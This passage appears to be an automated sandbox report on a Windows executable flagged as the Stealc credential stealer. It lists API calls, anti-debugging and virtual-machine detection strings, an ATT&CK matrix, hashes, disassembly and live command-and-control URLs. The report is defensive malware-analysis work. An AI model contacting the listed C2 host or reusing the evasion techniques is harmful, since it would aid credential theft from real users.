A,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_003A2390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0039DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0039DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003ACBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003ACBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003AD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003AD530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003ADD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_003ADD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003916B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_003916B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003916A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003916A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_003B1BF0
              Source: file.exe, file.exe, 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000002.2253123340.0000000000F56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: file.exe, 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000001.00000002.2253123340.0000000000F93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25926
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-26073
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-26080
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25945
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00394A60 VirtualProtect 00000000,00000004,00000100,?1_2_00394A60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_003B6390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B6390 mov eax, dword ptr fs:[00000030h]1_2_003B6390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_003B2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6620, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_003B4610
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_003B46A0
              Source: file.exe, file.exe, 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_003B2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,1_2_003B1B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_003B2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_003B2C10

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2192817969.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6620, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2192817969.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6620, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              Create Account
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              33
              Virtualization/Sandbox Evasion
              LSASS Memory641
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools
              Security Account Manager33
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection
              NTDS13
              Process Discovery
              Distributed Component Object ModelInput Capture12
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              Account Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials1
              System Owner/User Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem324
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe42%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php/=100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phplP100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phptop100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpjG100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                high
                http://185.215.113.206/false
                  high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://185.215.113.206/c4becf79229cb002.php/=file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://185.215.113.206/c4becf79229cb002.phpjGfile.exe, 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://185.215.113.206file.exe, 00000001.00000002.2253123340.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://185.215.113.206/Xfile.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://185.215.113.206/c4becf79229cb002.phplPfile.exe, 00000001.00000002.2253123340.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.206/ufile.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://185.215.113.206/c4becf79229cb002.phptopfile.exe, 00000001.00000002.2253123340.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.206
                            unknownPortugal
                            206894WHOLESALECONNECTIONSNLtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1559586
                            Start date and time:2024-11-20 17:40:13 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 18s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 122
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                            • Excluded IPs from analysis (whitelisted): 20.234.120.54
                            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, ris-prod.trafficmanager.net, tse1.mm.bing.net, ctldl.windowsupdate.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.206file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.43
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.43
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.944416064399235
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'753'088 bytes
                            MD5:73da003f0368f871f2bd1b9b2e0ec575
                            SHA1:771136fb463501015f73f5cacbec4b5a7c93be18
                            SHA256:1f4d60eb730020737ff8fbcbff87fb5227003745d875b6b4965bd5cac4925576
                            SHA512:d9373d57d285c82430468001da2d23617741af36cc87bb15a0aebb648a79a8328aec3ab5ba49f63fe0eb4d9d2f2f9704678a7b261feb3d641016e16726088bbd
                            SSDEEP:49152:kjPgnnYsS4/+uXUXhoHwIIG9A8sCdfmDP:kjPgnPhWMRhIGrskf
                            TLSH:5F853351A7B69E80C2E04CB4D3A3C79E2A009506D7C65098B86B413EEAF23FA7571D1B
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xa76000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007F63C8F0F66Ah
                            setle byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [ebx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edi], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x2490000x1620067ff32e9ad520c97597930ee7a216716unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x24a0000x1ac0x2004e16f9e62c3c82c4588487f17de895a8False0.58203125data4.555841354752362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x24c0000x2960000x200d3295095dc09f7f5ef2abaa41ac8b43bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            nflvzldk0x4e20000x1930000x1922009f121f2f46c9ba0e3106d636c7727723False0.9946585036524712data7.9535417712183945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            tlfgsqna0x6750000x10000x400fda832d6f98ff4d34a74c5d5e44b9268False0.7490234375data5.85465547772816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6760000x30000x22009a7c36eb3758f5464e9fb3ab0e1b670eFalse0.06640625DOS executable (COM)0.8163163707597264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x673f500x152ASCII text, with CRLF line terminators0.6479289940828402
                            DLLImport
                            kernel32.dlllstrcpy
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-11-20T17:41:19.739322+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649723185.215.113.20680TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 20, 2024 17:41:17.720056057 CET4972380192.168.2.6185.215.113.206
                            Nov 20, 2024 17:41:17.841942072 CET8049723185.215.113.206192.168.2.6
                            Nov 20, 2024 17:41:17.842128992 CET4972380192.168.2.6185.215.113.206
                            Nov 20, 2024 17:41:17.842915058 CET4972380192.168.2.6185.215.113.206
